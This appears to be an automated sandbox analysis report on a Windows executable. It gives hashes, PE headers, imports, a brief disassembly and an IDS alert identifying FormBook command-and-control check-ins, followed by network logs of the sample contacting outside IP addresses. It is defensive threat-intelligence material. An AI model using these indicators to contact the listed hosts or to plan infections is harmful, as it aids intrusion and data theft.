                                                          Entropy (8bit):7.993157199146226
                                                          Encrypted:true
                                                          SSDEEP:6144:Tmn53woLrbQI+41Mo7fIoDycMSCouZUHS9drY/A:kNwo/bQH4jDxDycMSCtUHS9dYA
                                                          MD5:B137BE5FC54F6B724BA7062CBA8BFA92
                                                          SHA1:501423341C2EA96B2FAB4453006F3F6CD2A4CF78
                                                          SHA-256:E4C4FA743DA2E4FEB15378B568ACEA1E55A3596412139FF57FB697A7C2A0CF2B
                                                          SHA-512:EF72F289E2B70A28E954F3C2B8F100F3F8C7E435C3F41328A49ED55726F213F069B6C3535A503A1C471879560DBC452A873249A91236DCFA8CAA652423BFD718
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):270848
                                                          Entropy (8bit):7.993157199146226
                                                          Encrypted:true
                                                          SSDEEP:6144:Tmn53woLrbQI+41Mo7fIoDycMSCouZUHS9drY/A:kNwo/bQH4jDxDycMSCtUHS9dYA
                                                          MD5:B137BE5FC54F6B724BA7062CBA8BFA92
                                                          SHA1:501423341C2EA96B2FAB4453006F3F6CD2A4CF78
                                                          SHA-256:E4C4FA743DA2E4FEB15378B568ACEA1E55A3596412139FF57FB697A7C2A0CF2B
                                                          SHA-512:EF72F289E2B70A28E954F3C2B8F100F3F8C7E435C3F41328A49ED55726F213F069B6C3535A503A1C471879560DBC452A873249A91236DCFA8CAA652423BFD718
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9816
                                                          Entropy (8bit):7.600873196675209
                                                          Encrypted:false
                                                          SSDEEP:192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycOWt/mPsokdW05Ju:I6q+Brw/gjYKycJt/mXcxJu
                                                          MD5:C93E02FAC913657BF437358D4AE797B8
                                                          SHA1:923E07D41F9C315D0257BAE8D99587A307F31B8D
                                                          SHA-256:B0BBB5AA1D3C82048A935AC92E14D73FE086A1559C3B02377349762EEABE3F8B
                                                          SHA-512:D6771FB074C90CDE16DADDFCF621FF20FCD2FEB66A93BC66F60F8BAA92A8F9A90BC4D0890A7775D841CA79130D38A4CB5438D68F97486D6BFCE344EABE2C704C
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          File Type:ASCII text, with very long lines (28756), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28756
                                                          Entropy (8bit):3.586444885340032
                                                          Encrypted:false
                                                          SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHZ:miTZ+2QoioGRk6ZklputwjpjBkCiw2Rz
                                                          MD5:39CC20E0608C4A2B47D74CE439DCBF84
                                                          SHA1:2B0462EBA6054DF581D40AE0624780B6E8981B53
                                                          SHA-256:13C96E8C4122C32D77A40D952285FB8484A4023D3FBF68A0272D0AB3BFC77DBC
                                                          SHA-512:950272122C93ADCD04BEFBA5686A36A3269830876CABA427DA68F3D8195B8ABB9173FACD264CAA98C8C8CB373B823A063A82148454BEA2089C1AFCD60173B703
                                                          Malicious:false
                                                          Reputation:low
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.053685704500323
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:7RsDGpyOQk.exe
                                                          File size:1'230'848 bytes
                                                          MD5:cf27e45be1b40dd336d102e1449046d9
                                                          SHA1:5c0dcbb199502fed8f89d65cd3c2c5be9e0348f1
                                                          SHA256:24f58a84a8acf1b1e52fe60798e03b2e3b97d5f52628d7c40ffcc9b7937b9b12
                                                          SHA512:10083faa57f70cc177303b60e6a149b024ddb272c73a2778a9984caf1e062f148161883d88057615ed7f3f197b649b585da2098d1d94ade8eb7ee38da0f2b3d1
                                                          SSDEEP:24576:9AHnh+eWsN3skA4RV1Hom2KXMmHac78r8QW7NjIssyY5:ch+ZkldoPK8YaE8r8b7NjA
                                                          TLSH:7D45AD02B391C035FFAA92735B26F62156BD7D294133852F22D83DBABDB10B1163D663
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                          Icon Hash:d4a684988ca4a0c5
                                                          Entrypoint:0x42800a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x667AAD23 [Tue Jun 25 11:42:27 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                          Instruction
                                                          call 00007FCF5CF0BC2Dh
                                                          jmp 00007FCF5CEFE9E4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007FCF5CEFEB6Ah
                                                          cmp edi, eax
                                                          jc 00007FCF5CEFEECEh
                                                          bt dword ptr [004C41FCh], 01h
                                                          jnc 00007FCF5CEFEB69h
                                                          rep movsb
                                                          jmp 00007FCF5CEFEE7Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007FCF5CEFED34h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007FCF5CEFEB70h
                                                          bt dword ptr [004BF324h], 01h
                                                          jc 00007FCF5CEFF040h
                                                          bt dword ptr [004C41FCh], 00000000h
                                                          jnc 00007FCF5CEFED0Dh
                                                          test edi, 00000003h
                                                          jne 00007FCF5CEFED1Eh
                                                          test esi, 00000003h
                                                          jne 00007FCF5CEFECFDh
                                                          bt edi, 02h
                                                          jnc 00007FCF5CEFEB6Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007FCF5CEFEB73h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007FCF5CEFEBC5h
                                                          bt esi, 03h
                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD5 build 40629
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x620fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12b000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x620fc | 0x62200 | f3bf25d062cf64311056bee6f07bde13 | False | 0.8252985668789808 | data | 7.591179161672578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x12b000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc8458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc8580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc86a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc87d0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.07945403998580386
RT_MENU | 0xd8ff8 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xd9048 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xd95dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xd9c68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xda0f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xda6f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdad50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdb1b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdb310 | 0x4e8ce | data | | | 1.0003294565210634
RT_GROUP_ICON | 0x129be0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x129bf4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x129c08 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x129c1c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x129c30 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x129d0c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Imports
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/03/24-15:57:00.193570 | TCP | 2856318 | ETPRO TROJAN FormBook CnC Checkin (POST) M4 | 49738 | 80 | 192.168.2.4 | 76.223.105.230

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 15:56:44.052105904 CEST | 49736 | 80 | 192.168.2.4 | 185.106.178.60
Jul 3, 2024 15:56:44.056984901 CEST | 80 | 49736 | 185.106.178.60 | 192.168.2.4
Jul 3, 2024 15:56:44.057132006 CEST | 49736 | 80 | 192.168.2.4 | 185.106.178.60
Jul 3, 2024 15:56:44.059632063 CEST | 49736 | 80 | 192.168.2.4 | 185.106.178.60
Jul 3, 2024 15:56:44.068073988 CEST | 80 | 49736 | 185.106.178.60 | 192.168.2.4
Jul 3, 2024 15:56:44.945144892 CEST | 80 | 49736 | 185.106.178.60 | 192.168.2.4
Jul 3, 2024 15:56:44.945270061 CEST | 80 | 49736 | 185.106.178.60 | 192.168.2.4
Jul 3, 2024 15:56:44.945353031 CEST | 49736 | 80 | 192.168.2.4 | 185.106.178.60
Jul 3, 2024 15:56:44.948889971 CEST | 49736 | 80 | 192.168.2.4 | 185.106.178.60
Jul 3, 2024 15:56:44.954463005 CEST | 80 | 49736 | 185.106.178.60 | 192.168.2.4
Jul 3, 2024 15:57:00.185970068 CEST | 49738 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:00.191063881 CEST | 80 | 49738 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:00.191216946 CEST | 49738 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:00.193569899 CEST | 49738 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:00.198550940 CEST | 80 | 49738 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:00.665910006 CEST | 80 | 49738 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:00.665935993 CEST | 80 | 49738 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:00.666059017 CEST | 49738 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:00.666773081 CEST | 80 | 49738 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:00.666903019 CEST | 49738 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:01.697953939 CEST | 49738 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:02.741179943 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:02.746213913 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:02.746301889 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:02.753685951 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:02.758548021 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:03.250248909 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:03.250319004 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:03.250332117 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:03.250391960 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:03.250391960 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:04.260433912 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:05.278815985 CEST | 49740 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:05.283912897 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.284006119 CEST | 49740 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:05.286130905 CEST | 49740 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:05.291018963 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291053057 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291065931 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291163921 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291173935 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291183949 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291202068 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291212082 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.291251898 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.759968996 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.760221004 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.760262966 CEST | 49740 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:05.765393972 CEST | 80 | 49740 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:05.765445948 CEST | 49740 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:06.791853905 CEST | 49740 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:07.811968088 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:07.818739891 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:07.818821907 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:07.820550919 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:07.825418949 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:08.515039921 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:08.515057087 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:08.515065908 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:08.515222073 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:08.515571117 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:08.515613079 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:08.517859936 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:08.519464016 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:08.519521952 CEST | 49741 | 80 | 192.168.2.4 | 76.223.105.230
Jul 3, 2024 15:57:08.522744894 CEST | 80 | 49741 | 76.223.105.230 | 192.168.2.4
Jul 3, 2024 15:57:13.901796103 CEST | 49742 | 80 | 192.168.2.4 | 35.244.172.47
